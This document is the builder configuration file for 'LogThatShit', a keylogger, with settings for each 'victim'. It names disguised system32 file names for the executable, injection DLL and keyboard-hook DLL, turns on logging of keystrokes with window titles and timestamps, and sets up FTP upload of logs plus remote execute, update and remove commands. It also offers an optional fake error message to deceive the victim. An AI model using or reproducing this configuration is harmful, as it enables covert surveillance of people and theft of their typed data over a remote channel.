
; LogThatShit by Isam M. (r0cket(NO_SPAM)jump@yahoo.com) 
; http://biodegradablegeek.com/
; License GPL (see license.txt)
;
; For information about each variable, glance at README.txt 

[BUILD] 
; Default values here should suffice. 
OUTPUT=Output.exe 
STUB=Stub.lts 
INJECTION=Injection.dll 
HOOK=Hook.dll 
FTPTEST=1 

[GENERAL] 
; Use a different alias for EVERY victim. 
; Make sure FILENAME has an executable extension. 
; Last 4 variables SHOULD NOT contain a path! Only filename. 
ALIAS=enemy
PATH=C:\WINDOWS\system32\
FILENAME=nwiz32k.exe
LOGNAME=syst3m.log
INJECTNAME=sysarg32.dll
HOOKNAME=syskeys32.dll

[REMOTE] 
; The following files MUST reside in the FTP dir specificed below. 
; If uploading to the ftp dir specified below fails, the root FTP 
; dir '/' is attempted. The names ARE case sensitive! 
; EXEC must have an EXE extension 
; REMOVE and UPDATE do not need to have an extension 
EXEC=lts_exec.exe
REMOVE=lts_remove
UPDATE=lts_update.exe

[LOG] 
; MAXLOGSIZE is in bytes, LOGCHECKINT is in seconds. README.txt for 
; more information. 
MAXLOGSIZE=5000
LOGCHECKINT=20
LOGTITLE=1
LOGTITLECHANGE=1
LOGPATH=1
LOGTIMESTAMP=1

[FTP] 
; *It is recommended that you read 'FTP information' in README.txt* 
; Use a different FTP root for EVERY victim. 
ROOT=/www/dir
HOST=host
USER=user
PASS=pass

[MISC]
; Should a fake error message box display when the file is ran? 
FAKEERROR=0
ERRMSG=usernt.dll broke
ERRCAP=Critical error


